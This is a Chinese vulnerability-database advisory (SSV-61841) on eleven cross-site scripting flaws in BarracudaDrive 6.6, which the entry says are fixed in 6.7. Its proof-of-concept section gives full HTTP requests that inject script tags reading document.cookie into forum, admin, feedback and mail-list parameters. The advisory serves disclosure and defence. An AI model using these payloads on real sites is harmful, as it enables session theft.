BarracudaDrive多个跨站脚本漏洞

基本字段

漏洞编号：: SSV-61841

披露/发现时间：: 未知

提交时间：: 2014-03-18

漏洞等级：

漏洞类别：: 跨站脚本

影响组件：: (6.6)

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 Knownsec 共获得 0KB

BarracudaDrive运用了网页界面的模式,让我们能轻松的与朋友分享文件。 1)通过'/Forum/manage/ForumManager.lsp?nForumId=1'中'sForumName', 'sDescription'参数传递的输入在返回用户前没有正确验证，攻击者可以利用漏洞在受影响站点上下文的用户浏览器会话中执行任意HTML和脚本代码。 2)通过'/Forum/manage/hangman.lsp?nId=1'中'sHint', 'sWord'参数传递的输入在返回用户前没有正确验证，攻击者可以利用漏洞在受影响站点上下文的用户浏览器会话中执行任意HTML和脚本代码。 3)通过'/Forum/manage/hangman.lsp'中'nId'参数传递的输入在返回用户前没有正确验证，攻击者可以利用漏洞在受影响站点上下文的用户浏览器会话中执行任意HTML和脚本代码。 4)通过'/Forum/manage/ForumManager.lsp?newforum=true'中'sForumName', 'sDescription'参数传递的输入在返回用户前没有正确验证，攻击者可以利用漏洞在受影响站点上下文的用户浏览器会话中执行任意HTML和脚本代码。 5)通过'/rtl/protected/admin/wizard/setuser.lsp'中'user'参数传递的输入在返回用户前没有正确验证，攻击者可以利用漏洞在受影响站点上下文的用户浏览器会话中执行任意HTML和脚本代码。 6)通过'/feedback.lsp'中'name', 'email'参数传递的输入在返回用户前没有正确验证，攻击者可以利用漏洞通过'/private/manage/messages.lsp'或'/private/manage/messages.lsp?key=1' URI在受影响站点上下文的用户浏览器会话中执行任意HTML和脚本代码 7)通过'/private/manage/PageManager.lsp?parent=0&newpage=true'中'lname', 'url'参数传递的输入在返回用户前没有正确验证，攻击者可以利用漏洞在受影响站点上下文的用户浏览器会话中执行任意HTML和脚本代码。 8)通过'/private/manage/PageManager.lsp?parent=0&edit=9中'lname', 'url'参数传递的输入在返回用户前没有正确验证，攻击者可以利用漏洞在受影响站点上下文的用户浏览器会话中执行任意HTML和脚本代码。 9)通过'/fs'中'cmd'参数传递的输入在返回用户前没有正确验证，攻击者可以利用漏洞在受影响站点上下文的用户浏览器会话中执行任意HTML和脚本代码。 10)通过'/rtl/protected/mail/manage/list.lsp'中'newname', 'description'参数传递的输入在返回用户前没有正确验证，攻击者可以利用漏洞在受影响站点上下文的用户浏览器会话中执行任意HTML和脚本代码。 11)通过'/rtl/protected/mail/manage/list.lsp?name=test中'firstname', 'lastname', 'id'参数传递的输入在返回用户前没有正确验证，攻击者可以利用漏洞在受影响站点上下文的用户浏览器会话中执行任意HTML和脚本代码。 0 BarracudaDrive 6.6 BarracudaDrive 6.7版本以修复此漏洞，建议用户下载使用： http://barracudaserver.com

共 0 兑换了

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0KB

1) POST /Forum/manage/ForumManager.lsp?nForumId=1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/Forum/manage/ForumManager.lsp?nForumId=1 Cookie: z9ZAqJtI=714dd7c0530d8b06 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 170 Post Data : ========== nSortOrder=0&sForumName=<script>alert(document.cookie)</script>&sDescription=<script>alert(document.cookie)</script>&deleteforum=no&nForumId=1 2) POST /Forum/manage/hangman.lsp?nId=1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/Forum/manage/hangman.lsp?nId=1 Cookie: z9ZAqJtI=714dd7c0530d8b06 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 135 Post Data : =========== sHint=<script>alert(document.cookie)</script>&sWord=<script>alert(document.cookie)</script>&save=Save&nId=1 3) GET /Forum/manage/hangman.lsp?nId=<script>alert(document.cookie)</script> (With atleast single entry in the table of Word Manager) 4) POST /Forum/manage/ForumManager.lsp?newforum=true Host: localhost User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/Forum/manage/ForumManager.lsp?newforum=true Cookie: z9ZAqJtI=714dd7c0530d8b06 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 171 Post Data : ========== nSortOrder=0&sForumName=<script>alert(document.cookie)</script>&sDescription=<script>alert(document.cookie)</script>&deleteforum=no&nForumId=-1 5) POST /rtl/protected/admin/wizard/setuser.lsp Host: localhost User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/rtl/protected/admin/wizard/setuser.lsp Cookie: z9ZAqJtI=714dd7c0530d8b06 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 92 Post Data : ========== user=<script>alert(document.cookie)</script>&password=test&path=/c/bdusers 6) POST /feedback.lsp Host: localhost User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/Contact-Us.html Cookie: z9ZAqJtI=714dd7c0530d8b06 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 226 Post Data : ========== name=<script>alert(document.cookie)</script>&email=<script>alert(document.cookie)</script>&message=test&k1=1393176261&k2=652054939&ck1=JBxYStg2gm3CuvlMdKlxsA==&ck2=JxxfTNM1hm7Nu/YxAAAAAA== Effect will on: /private/manage/messages.lsp /private/manage/messages.lsp?key=1 7) POST /private/manage/PageManager.lsp?parent=0&newpage=true Host: localhost User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/private/manage/PageManager.lsp?parent=0&newpage=true Cookie: tzone=--330; z9ZAqJtI=714dd7c0530d8b06 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 158 Post Data : ========== position=0&lname=<script>alert(document.cookie)</script>&url=<script>alert(document.cookie)</script>&deletepage=no&parent=0&key=-1 8) POST /private/manage/PageManager.lsp?parent=0&edit=9 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/private/manage/PageManager.lsp?parent=0&edit=9 Cookie: tzone=--330; z9ZAqJtI=714dd7c0530d8b06 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 174 Post Data : =========== position=0&lname=<script>alert(document.cookie)</script>&url=<script>alert(document.cookie)</script>&cancel=Cancel&deletepage=no&parent=0&key=9 Effects will be on: /private/manage/PageManager.lsp 9) GET /fs/?cmd=<script>alert(document.cookie)</script> 10) POST /rtl/protected/mail/manage/list.lsp Host: localhost User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/rtl/protected/mail/manage/list.lsp Cookie: tzone=--330; z9ZAqJtI=714dd7c0530d8b06 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 99 Post Data : =========== newname=<script>alert(document.cookie)</script>&description=<script>alert(document.cookie)</script>&save=Create+New+List Effect will be on '/rtl/protected/mail/manage/lists.lsp' 11) POST /rtl/protected/mail/manage/list.lsp?name=test Host: localhost User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/rtl/protected/mail/manage/list.lsp?name=test Cookie: tzone=--330; z9ZAqJtI=714dd7c0530d8b06 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 259 Post Data : ========== listkey=2&email=test123@gmail.com&firstname=<script>alert(document.cookie)</script>&lastname=<script>alert(document.cookie)</script>&id=<script>alert(document.cookie)</script>&addsub=save&name=test&offset=0&save=Save 12) GET /fs/<script>alert(document.cookie)</script>

共 3 兑换

参考链接

http://packetstormsecurity.com/files/125766/BarracudaDrive-6.6-Cross-Site-Scripting.html

解决方案

临时解决方案

官方解决方案

防护方案

匿名兑换PoC
匿名兑换PoC
匿名兑换PoC

生命线

发现/披露了漏洞
2014-03-18 提交了漏洞
2014-03-18 提交补充了漏洞详情
2014-03-18 提交更新了 PoC

BarracudaDrive多个跨站脚本漏洞

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

BarracudaDrive多个跨站脚本漏洞

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定